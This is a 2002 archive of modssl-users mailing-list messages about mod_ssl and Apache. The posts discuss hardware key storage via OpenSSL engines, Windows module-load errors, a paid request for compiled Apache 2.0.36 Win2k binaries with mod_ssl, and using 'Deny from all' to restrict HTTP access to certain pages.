From owner-modssl-users@modssl.org  Sat Jun  8 15:00:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA15627; Sat, 8 Jun 2002 14:59:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from relay-2v.club-internet.fr id OAA15604; Sat, 8 Jun 2002 14:58:31 +0200 (MET DST)
Received: from vaio (aub19-129.n.club-internet.fr [195.36.133.129])
	by relay-2v.club-internet.fr (Postfix) with SMTP id 328731734
	for ; Sat,  8 Jun 2002 14:58:26 +0200 (CEST)
Date: Sat, 8 Jun 2002 14:56:22 +0200
From: Francois Desarmenien 
To: modssl-users@modssl.org
Subject: Re: Hardware key storage
Message-Id: <20020608145622.46cca426.francois@fdesar.net>
In-Reply-To: <00dc01c20d00$71955b90$5010a8c0@IMRANPC>
References: 
	<00dc01c20d00$71955b90$5010a8c0@IMRANPC>
X-Mailer: Sylpheed version 0.7.4 (GTK+ 1.2.10; i386-debian-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Francois Desarmenien 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Le Wed, 5 Jun 2002 19:18:26 -0700
"Imran Badr"  a ecrit:

> Hi,
> I am sorry if this question has been asked before in this group. I wanted to
> find out what would be required to use private keys stored in hardware with
> apache and modssl ? Modssl code looks for private key file in the host
> machine and calls use_private_key() sort of function of openssl to store
> private key in ssl context. Is it possible to use modssl with apache when
> keys are created in tamper proof hardware and never leaves that? Is there
> any patch to do that?

mod_ssl relies on OpenSSL and OpenSSL-engine handles access for some
cryto cards.

F.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun  8 15:27:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA16992; Sat, 8 Jun 2002 15:26:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sitesontesting.com id PAA16949; Sat, 8 Jun 2002 15:25:08 +0200 (MET DST)
Message-Id: <200206081325.PAA16949@opensource.ee.ethz.ch>
Received: from WorldClient [127.0.0.1]
	by sitesontesting.com [127.0.0.1]
	with SMTP (MDaemon.PRO.v5.0.5.R)
	for ; Sat, 08 Jun 2002 13:58:47 +0530
Date: Sat, 08 Jun 2002 13:58:26 +0530
From: "Prachait Saxena" 
To: modssl-users@modssl.org
CC: jwagner@s2logic.com
Subject: RE: [BugDB] Error Starting Apache when trying to use
	mod_ssl(PR#712)
X-Mailer: WorldClient 5.0.5
In-Reply-To: 
X-MDRemoteIP: 127.0.0.1
X-Return-Path: subscription@sitesontesting.com
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Prachait Saxena" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


But with me .. 

This problem arries not only with ssl but with all other modules for php 
or ldap
and what are the files of Apache which come with mod_ssl windows 
distrubution to be replaced?
and where can i get those

Prachait

-----Original Message-----
From: John Wagner 
To: modssl-users@modssl.org
Date: Fri, 07 Jun 2002 09:22:16 -0400
Subject: RE: [BugDB] Error Starting Apache when trying to use mod_ssl
(PR#712)

> It looks like you are installing on a Windows platform.  I had the same
> problem.  Then I remembered that I had not overwritten my Apache files
> with
> the one that came as a part of the mod_ssl distribution for Windows. 
> Check
> the "Apache+SSL Win32 HOWTO.html" document, section 4.
> jw
> John Wagner
> *** Carpe Diem Before the Diem Carpes You! ***
> 
> 
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Prachait Saxena
> Sent: Friday, June 07, 2002 5:31 AM
> To: modssl-users@modssl.org
> Subject: Re: [BugDB] Error Starting Apache when trying to use
> mod_ssl(PR#712)
> 
> 
> 
> I also have excatly same problem...
> 
> Prachait Saxena
> 
> -----Original Message-----
> From: modssl-bugdb@modssl.org
> To: modssl-users@modssl.org
> Date: Thu, 6 Jun 2002 04:39:06 +0200 (MET DST)
> Subject: [BugDB] Error Starting Apache when trying to use mod_ssl
> (PR#712)
> 
> > Full_Name: Luke Whitford
> > Version: 2.8.8
> > OS: Win98
> > Submission from: (NULL) (203.59.68.234)
> >
> >
> > When trying to start apache (1.3.24) with the mod_ssl module being
> > loaded the
> > following error occurs:
> >
> > C:\Program Files\Apache Group\Apache>apache
> > Syntax error on line 195 of c:/program files/apache
> > group/apache/conf/httpd.conf
> > :
> > Cannot load c:/program files/apache group/apache/modules/mod_ssl.so
> > into
> > server:
> >  (31) A device attached to the system is not functioning:
> >
> > Note the errors or messages above, and press the  key to exit.
> > 0....
> >
> > Any ideas on how to remedy the situation would be greatly appreciated
> >
> >
> ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                  
> www.modssl.org
> > User Support Mailing List                     
> modssl-users@modssl.org
> > Automated List Manager                           
> majordomo@modssl.org
> >
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jun  9 02:37:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA18155; Sun, 9 Jun 2002 02:36:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.siddley.net id CAA18122; Sun, 9 Jun 2002 02:36:03 +0200 (MET DST)
Received: from odette ([])
        by mail.siddley.net (Sendmail 8.12.1/Debian -5) with SMTP id 84E8BA1A
        for ; Sun, 09 Jun 2002 00:35:32 -0000
Message-ID: <004301c20f4e$2cb48910$505536d2@odette>
From: "John" 
To: 
Subject: 2.0.36 + mod-ssl + Win2k = Easy Money
Date: Sun, 9 Jun 2002 12:39:43 +1200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello list members,

We have just spent (wasted) 3 days trying to compile Apache 2.0.36 with
zlib and mod-ssl on win2k for a critical project and we have been
unsuccessful. Thus the offer of easy money!

We need working binaries for the config described above URGENTLY and we
are willing to pay $500 worth of real gold (www.goldmoney.com) to the
first person who can supply them to us. This gold can be redeemed for
cash anywhere in the world.

If you want even MORE easy money, we are willing to pay a further $500
worth of real gold to anyone who can help us to actually compile
successfully. Details of what we have done and our results are below for
those who are interested:

Source: Apache 2.0.36, OpenSSL 2.6.9d, zlib (latest)

First we discovered you can not use the instructions on the howto at
http://httpd.apache.org/docs-2.0/platform/win_compiling.html... the
instructions (perl commands) for creating the makefiles etc. before
compiling should not be used... Apache mod-ssl will need idea etc to
compile.

So we compiled OpenSSL using the instructions in INSTALL.W32 supplied
with OpenSSL and OpenSSL compiled perfectly first time with no errors or
warnings.

Next we moved the entire OpenSSL folder into ..\srclib\openssl as
instructed in the apache howto.
We also followed the instructions for zlib.

We got a version of awk for windows and installed it on the path as
instructed.

First we compiled without the openssl directory installed, and the nossl
version of Apache compiled fine, with the compile finishing with 4
warnings and no errors.

Compiling with the openssl directory installed brought a whole lot of
problems on!

First we got an error about not finding Bison, so we went and found a
Win2k version of bison (and bison.hairy and bison.simple)...

Then we needed flex, so we got that...

Then we needed sed, so we got that....

Then when we compiled we got an error "could not find y.tab.c etc"... we
discovered our version of bison uses y_tab.c and y_tab.h instead, so we
corrected that...

By now this had taken us a day or two of searching lists and web etc....

And still we get errors! now we are getting "undefined external _alloca"
errors...

So now we offer money for anyone who can help... we really would like to
get this right so we can write a proper howto, plus we have a critical
project we need to complete.

Thanks in advance,

John.





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jun  9 05:36:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA25017; Sun, 9 Jun 2002 05:35:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from krusty.unitec.edu.ve id FAA24987; Sun, 9 Jun 2002 05:34:04 +0200 (MET DST)
Received: from caligula.unitec.edu.ve (val2-ppp052.t-net.net.ve [200.35.112.182]) by krusty.unitec.edu.ve with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2448.0)
	id LR8KYGHQ; Sat, 8 Jun 2002 23:44:48 -0400
Message-Id: <5.1.0.14.0.20020608233206.00b29658@mail.unitec.edu.ve>
X-Sender: vmedina98@mail.unitec.edu.ve
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Sat, 08 Jun 2002 23:33:44 -0400
To: modssl-users@modssl.org
From: Victor Medina 
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
In-Reply-To: <004301c20f4e$2cb48910$505536d2@odette>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Victor Medina 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi there!

I can provide Apache binaries with mod_ssl included and zlib (dll's and 
lib) with no problems, just contact me via my private mail to tell you 
where to download it, if you haven't done taht yet from any member of the list

Victor Medina

At 12:39 PM 6/9/2002 +1200, you wrote:
>Hello list members,
>
>We have just spent (wasted) 3 days trying to compile Apache 2.0.36 with
>zlib and mod-ssl on win2k for a critical project and we have been
>unsuccessful. Thus the offer of easy money!
>
>We need working binaries for the config described above URGENTLY and we
>are willing to pay $500 worth of real gold (www.goldmoney.com) to the
>first person who can supply them to us. This gold can be redeemed for
>cash anywhere in the world.
>
>If you want even MORE easy money, we are willing to pay a further $500
>worth of real gold to anyone who can help us to actually compile
>successfully. Details of what we have done and our results are below for
>those who are interested:
>
>Source: Apache 2.0.36, OpenSSL 2.6.9d, zlib (latest)
>
>First we discovered you can not use the instructions on the howto at
>http://httpd.apache.org/docs-2.0/platform/win_compiling.html... the
>instructions (perl commands) for creating the makefiles etc. before
>compiling should not be used... Apache mod-ssl will need idea etc to
>compile.
>
>So we compiled OpenSSL using the instructions in INSTALL.W32 supplied
>with OpenSSL and OpenSSL compiled perfectly first time with no errors or
>warnings.
>
>Next we moved the entire OpenSSL folder into ..\srclib\openssl as
>instructed in the apache howto.
>We also followed the instructions for zlib.
>
>We got a version of awk for windows and installed it on the path as
>instructed.
>
>First we compiled without the openssl directory installed, and the nossl
>version of Apache compiled fine, with the compile finishing with 4
>warnings and no errors.
>
>Compiling with the openssl directory installed brought a whole lot of
>problems on!
>
>First we got an error about not finding Bison, so we went and found a
>Win2k version of bison (and bison.hairy and bison.simple)...
>
>Then we needed flex, so we got that...
>
>Then we needed sed, so we got that....
>
>Then when we compiled we got an error "could not find y.tab.c etc"... we
>discovered our version of bison uses y_tab.c and y_tab.h instead, so we
>corrected that...
>
>By now this had taken us a day or two of searching lists and web etc....
>
>And still we get errors! now we are getting "undefined external _alloca"
>errors...
>
>So now we offer money for anyone who can help... we really would like to
>get this right so we can write a proper howto, plus we have a critical
>project we need to complete.
>
>Thanks in advance,
>
>John.
>
>
>
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jun  9 11:21:37 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA09233; Sun, 9 Jun 2002 11:20:50 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA09103; Sun, 9 Jun 2002 11:19:47 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id E24174CE691; Sun,  9 Jun 2002 11:19:46 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 0404428965; Sun,  9 Jun 2002 11:09:01 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from out004.verizon.net id DAA14698; Sat, 8 Jun 2002 03:44:36 +0200 (MET DST)
Received: from hppav ([141.157.207.106]) by out004.verizon.net
          (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP
          id <20020608014429.TQFE7249.out004.verizon.net@hppav>
          for ; Fri, 7 Jun 2002 20:44:29 -0500
From: "lin geng" 
To: 
Subject: RE: How to disable part of the HTTP pages?
Date: Fri, 7 Jun 2002 21:44:27 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
In-Reply-To: <3321CF48237CD511909000B0D0F09DA370A5DD@EXCHANGE>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "lin geng" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Disable port 80.

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Conrad Ng
Sent: Wednesday, June 05, 2002 8:47 PM
To: modssl-users@modssl.org
Subject: How to disable part of the HTTP pages?


Dear all

After I have implemented the SSL technology in my servers, I understand that
users can access securely under HTTPS://. However, they can still
access through HTTP://. Is there any way to block people from
accessing under HTTP:// ? I'm not meaning to block the whole port 80 but
only some pages, is it belong to the settings of Apache or what? Please
instruct. Thanks a lot!!

Regards

Conrad Ng


______________________________________________________

Scott Wilson Ltd celebrates its new name during its 50th year in Hong Kong!

This e-mail and any attachments to it are intended only for the party to
whom they are addressed. They may contain privileged and/or confidential
information. If you have received this transmission in error please notify
the sender immediately and delete any digital copies and destroy any paper
copies. Thank you.

Scott Wilson accepts no contractual liabilities or commitments arising from
this e-mail unless subsequently confirmed by fax or letter or as an e-mail
attachment giving company name, address, registration number and authorized
signatory.
______________________________________________________


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jun  9 14:32:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA21479; Sun, 9 Jun 2002 14:31:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.inzen.com id OAA21444; Sun, 9 Jun 2002 14:30:48 +0200 (MET DST)
Received: from isengard (sslproxy.anonymous [10.4.1.102])
	(authenticated)
	by mail.inzen.com (8.11.6/8.11.6) with ESMTP id g59CZNl23190
	for ; Sun, 9 Jun 2002 21:35:25 +0900
From: "Han,Donghoon" 
To: 
Subject: RE: How to disable part of the HTTP pages?
Date: Sun, 9 Jun 2002 21:30:41 +0900
Message-ID: <000001c20fb1$78db6f30$0113030a@isengard>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
Importance: Normal
In-Reply-To: 
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Han,Donghoon" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Put "Deny from all" in  
in the vhost settings where the serving port is 80.

Ex)

BlahBlahBlah

	Order Deny,Allow
	Deny from all




BlahBlah

	Order Allow,Deny
	Allow from all



Refer to the apache manual for further information.

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of lin geng
Sent: Saturday, June 08, 2002 10:44 AM
To: modssl-users@modssl.org
Subject: RE: How to disable part of the HTTP pages?

Disable port 80.

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Conrad Ng
Sent: Wednesday, June 05, 2002 8:47 PM
To: modssl-users@modssl.org
Subject: How to disable part of the HTTP pages?


Dear all

After I have implemented the SSL technology in my servers, I understand
that
users can access securely under HTTPS://. However, they can still
access through HTTP://. Is there any way to block people from
accessing under HTTP:// ? I'm not meaning to block the whole port 80 but
only some pages, is it belong to the settings of Apache or what? Please
instruct. Thanks a lot!!

Regards

Conrad Ng


______________________________________________________

Scott Wilson Ltd celebrates its new name during its 50th year in Hong
Kong!

This e-mail and any attachments to it are intended only for the party to
whom they are addressed. They may contain privileged and/or confidential
information. If you have received this transmission in error please
notify
the sender immediately and delete any digital copies and destroy any
paper
copies. Thank you.

Scott Wilson accepts no contractual liabilities or commitments arising
from
this e-mail unless subsequently confirmed by fax or letter or as an
e-mail
attachment giving company name, address, registration number and
authorized
signatory.
______________________________________________________


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 00:43:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA24920; Mon, 10 Jun 2002 00:42:45 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.siddley.net id AAA24885; Mon, 10 Jun 2002 00:41:53 +0200 (MET DST)
Received: from sidd ([])
        by mail.siddley.net (Sendmail 8.12.1/Debian -5) with SMTP id 84E8BA1A
        for ; Sun, 09 Jun 2002 22:41:42 -0000
Message-ID: <003f01c21006$d1d6aaf0$0207a8c0@sidd>
From: "John" 
To: 
References: <5.1.0.14.0.20020608233206.00b29658@mail.unitec.edu.ve>
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
Date: Mon, 10 Jun 2002 10:41:39 +1200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Well, we got one response from Victor, but he seems to be unable to
follow through (we don't get any response from his private e-mail) so we
still have $500 for anyone who can give us working binaries of apache
2.0.36 with mod-ssl...

Anyone? Is this actually possible? Has anyone ever got this right?

John.


----- Original Message -----
From: "Victor Medina" 
To: 
Sent: Sunday, June 09, 2002 3:33 PM
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money


Hi there!

I can provide Apache binaries with mod_ssl included and zlib (dll's and
lib) with no problems, just contact me via my private mail to tell you
where to download it, if you haven't done taht yet from any member of
the list

Victor Medina



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 01:09:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA25811; Mon, 10 Jun 2002 01:08:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id BAA25785; Mon, 10 Jun 2002 01:07:47 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g59N3rV23611
	for ; Sun, 9 Jun 2002 19:03:53 -0400
Date: Sun, 9 Jun 2002 19:03:53 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
In-Reply-To: <003f01c21006$d1d6aaf0$0207a8c0@sidd>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 10 Jun 2002, John wrote:

> Well, we got one response from Victor, but he seems to be unable to
> follow through (we don't get any response from his private e-mail) so we
> still have $500 for anyone who can give us working binaries of apache
> 2.0.36 with mod-ssl...
> Anyone? Is this actually possible? Has anyone ever got this right?

Of course it's possible.  I'd do it for you but I'm not convinced that I
as a US citizen am allowed to export strong-encryption binaries from the
US.  Which is, of course, the entire reason that the official
distributions don't come with mod_ssl binaries.

--Cliff

PS: If you can wait a few days, 2.0.37 will hopefully be out and it has
some important bugs fixed.  Just so you know.

---------------------------------------------------------------
   Cliff Woolley
   jwoolley@apache.org
   Apache HTTP Server Project

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 01:17:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA26552; Mon, 10 Jun 2002 01:16:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ivivos.com id BAA26521; Mon, 10 Jun 2002 01:15:43 +0200 (MET DST)
Received: from elusion [66.57.168.62] by ivivos.com with ESMTP
  (SMTPD32-7.07) id A1CD5B50060; Sun, 09 Jun 2002 19:16:29 -0400
From: "Chris Hsiang" 
To: 
Subject: RE: 2.0.36 + mod-ssl + Win2k = Easy Money
Date: Sun, 9 Jun 2002 19:16:29 -0400
Message-ID: <000101c2100b$af8cf350$0100a8c0@ivivos.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-Reply-To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Chris Hsiang" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Yes... compiling 2.0.36 with mod ssl is easy... which part of compiling
did you guys stocked? It should have the compile out/output text....
include in the email will help us to understand what happened and the
next time you probably can compile the future version of apache


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Cliff Woolley
Sent: Sunday, June 09, 2002 7:04 PM
To: modssl-users@modssl.org
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money

On Mon, 10 Jun 2002, John wrote:

> Well, we got one response from Victor, but he seems to be unable to
> follow through (we don't get any response from his private e-mail) so
we
> still have $500 for anyone who can give us working binaries of apache
> 2.0.36 with mod-ssl...
> Anyone? Is this actually possible? Has anyone ever got this right?

Of course it's possible.  I'd do it for you but I'm not convinced that I
as a US citizen am allowed to export strong-encryption binaries from the
US.  Which is, of course, the entire reason that the official
distributions don't come with mod_ssl binaries.

--Cliff

PS: If you can wait a few days, 2.0.37 will hopefully be out and it has
some important bugs fixed.  Just so you know.

---------------------------------------------------------------
   Cliff Woolley
   jwoolley@apache.org
   Apache HTTP Server Project

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 02:04:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id CAA28302; Mon, 10 Jun 2002 02:03:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.siddley.net id CAA28272; Mon, 10 Jun 2002 02:02:42 +0200 (MET DST)
Received: from sidd ([])
        by mail.siddley.net (Sendmail 8.12.1/Debian -5) with SMTP id 84E8BA1A
        for ; Mon, 10 Jun 2002 00:02:35 -0000
Message-ID: <008701c21012$1e893740$0207a8c0@sidd>
From: "John" 
To: 
References: <000101c2100b$af8cf350$0100a8c0@ivivos.com>
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
Date: Mon, 10 Jun 2002 12:02:32 +1200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks Chris,

There is a summary of what we did on the original post to this thread...
any help is appreciated, thanks,

John.





----- Original Message -----
From: "Chris Hsiang" 
To: 
Sent: Monday, June 10, 2002 11:16 AM
Subject: RE: 2.0.36 + mod-ssl + Win2k = Easy Money


Yes... compiling 2.0.36 with mod ssl is easy... which part of compiling
did you guys stocked? It should have the compile out/output text....
include in the email will help us to understand what happened and the
next time you probably can compile the future version of apache


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Cliff Woolley
Sent: Sunday, June 09, 2002 7:04 PM
To: modssl-users@modssl.org
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money

On Mon, 10 Jun 2002, John wrote:

> Well, we got one response from Victor, but he seems to be unable to
> follow through (we don't get any response from his private e-mail) so
we
> still have $500 for anyone who can give us working binaries of apache
> 2.0.36 with mod-ssl...
> Anyone? Is this actually possible? Has anyone ever got this right?

Of course it's possible.  I'd do it for you but I'm not convinced that I
as a US citizen am allowed to export strong-encryption binaries from the
US.  Which is, of course, the entire reason that the official
distributions don't come with mod_ssl binaries.

--Cliff

PS: If you can wait a few days, 2.0.37 will hopefully be out and it has
some important bugs fixed.  Just so you know.

---------------------------------------------------------------
   Cliff Woolley
   jwoolley@apache.org
   Apache HTTP Server Project

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 10 05:33:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA08129; Mon, 10 Jun 2002 05:32:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from networldsystems.com id FAA08092; Mon, 10 Jun 2002 05:31:20 +0200 (MET DST)
Received: from [66.136.32.169] (66.136.32.169) by networldsystems.com with
 ESMTP (Eudora Internet Mail Server 3.0.3) for ;
 Sun, 9 Jun 2002 22:27:26 -0500
Mime-Version: 1.0
X-Sender: Steve@mail.NetWorldSystems.com
Message-Id: 
In-Reply-To: <004301c20f4e$2cb48910$505536d2@odette>
References: <004301c20f4e$2cb48910$505536d2@odette>
Date: Sun, 9 Jun 2002 22:31:11 -0500
To: modssl-users@modssl.org
From: Steve Parrish 
Subject: Re: 2.0.36 + mod-ssl + Win2k = Easy Money
Content-Type: text/plain; charset="us-ascii" ; format="flowed"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Steve Parrish 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>Hello list members,
>
